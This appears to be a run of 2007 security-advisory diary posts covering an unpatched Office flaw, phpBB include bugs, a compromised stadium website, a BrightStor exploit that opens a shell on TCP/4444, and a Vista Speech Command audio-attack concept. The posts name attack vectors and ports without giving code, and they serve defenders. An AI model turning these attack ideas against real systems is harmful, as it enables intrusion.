On the xxxx day of christmas the handlers gave to me xxxx worms a spreading
On the xxxx day of christmas the handlers gave to me xxxx servers crashing
On the xxxx day of christmas the handlers gave to me xxxx phishers phishing
On the xxxx day of christmas the handlers gave to me xxxx logs for analyzing
On the xxxx day of christmas the handlers gave to me xxxx hackers hacking
On the xxxx day of christmas the handlers gave to me xxxx geeks a sleeping

I hope everyone who tried this had fun.  If you have questions, please feel free to ask.  If you have some interesting packets that you think might make for a good challenge and can share them, please pass them our way.  We can obfuscate them however you like.  This way we can all learn and have some fun together. 


Published: 2007-02-03

New, Unpatched Office Vulnerability

Microsoft has released an advisory for a remote code execution vulnerability in Microsoft Office.  It is currently reported to target only Microsoft Excel.  However, according to Microsoft's advisory:  "While we are currently only aware that Excel is the current attack vector, other Office applications are potentially vulnerable."  It has a CVE entry of CVE-2007-0671, although I could not find it in the database at this time and there is very limited information available.  The advisory applies to the following products:

Office 2000
Office XP
Office 2003
Office 2004 for Mac
Office 2004 v. X for Mac

Just keep reminding folks to exercise caution when opening attachments received via email or documents found on the internet. 


Published: 2007-02-02

Classic phpBB vulnerability impacts phpBB-based forums

It seems fairly obvious, but the classic phpbb_root_path vulnerability is present in products such as: Omegaboard, Cerulean Portal System, phpBB Tweaked, Hailboards, EclipseBB and Xero Portal.  All are affected by the vulnerability exposed by having register_globals set to "on".  It appears that it is being regularly exploited to deface systems as well.
Thanks for the lead Juergen!


Published: 2007-02-02

American Football Championship Shenanigans

Websense Labs has reported that "the official website of Dolphin Stadium has been compromised with malicious code."  As of now (~1820 GMT 02-FEB-2007) the site still has the injected redirect, but the site hosting the malicious code is not responding.  The malicious script is reported to exploit vulnerabilities described in Microsoft Security Bulletins MS06-014 and MS07-004.


Published: 2007-02-02

Friday Security Notes

Just a few things to read/follow-up/keep-an-eye-on over the weekend:

Wireshark announced a few Denial of Service vulnerabilities (i.e. it sees certain traffic and crashes) yesterday: www.wireshark.org/security/wnpa-sec-2007-01.html

Keep an eye out for 0.99.5 to be released soon.

Exploit code is available for Computer Associates BrightStor ARCserve Backup LGSERVER.EXE.
The targeted service listens on TCP/1900.  The example exploit sets up a shell on TCP/4444 (but that's trivial to change)
Dshield notes a bit of a peak: isc.sans.org/port.html?port=1900
Concentrated activity towards TCP/4400 is a bit less obvious.

Cisco vulnerabilities: there were a few issues identified by Cisco this week.  Keep an eye/ear/SEC-rule out for "instability issues" on your routing infrastructure.  For current details:


Published: 2007-02-01

Simon says: download backdoor.exe (or using Vista Speech Command for fun and profit)

Once in a while security researchers ask themselves simple questions to which they sincerely hope the answer is "of course not!".

This is the story of a question to which the answer is "oh my, this is fun!".

On January 30th Sebastian Krahmer asked himself (out loud on the Dailydave mailing list) whether the Windows Vista Speech Command function could be used by a malicious website feeding a wav file that would speak commands to download malware.  The idea is deceptively simple: the wav file plays through the speakers, the microphone picks up the commands and Speech Command happily executes them.

A fascinating discussion ensued, George Ou went off to research the concept and, at the risk of spoiling the surprise, here is the result in George's fine words:

"I recorded a sound file that would engage speech command on Vista, then engaged the start button, and then I asked for the command prompt.  When I played back the sound file with the speakers turned up loud, it actually engaged the speech command system and fired up the start menu.  I had to try a few more times to get the audio recording quality high enough to get the exact commands I wanted but the shocking thing is that it worked!"

Oh dear.

There are obviously a few obstacles to overcome to make this a viable attack, like having to spell out a long URL, so George tried to use the "tinyurl" service and indeed that worked just fine. The next question was whether it would work with untrained voices, and George reported that it would happily work.

The best picture in my mind of this attack vector is a large trading room, in the middle of the night, and one computer shouting out loud "start listening", "start", "internet explorer", "download <some tinyurl>", etc.

So, how about prevention?  Well, the answer is that you should disable Speech Command for the time being, or use it carefully and wait for Microsoft to issue a patch which ignores output from the computer's own speakers.

For those who are old enough to remember: about 15 years ago Apple introduced voice commands for MacOS and it was great fun to shout behind someone's back "shutdown" to see the Mac happily go into its shutdown routine. This was patched a while back on MacOS, as you can probably imagine, but it was a great prank.

Thanks to Gerrit Rothmaier for bringing it up at 08:42 this morning and dramatically improving my second espresso of the day.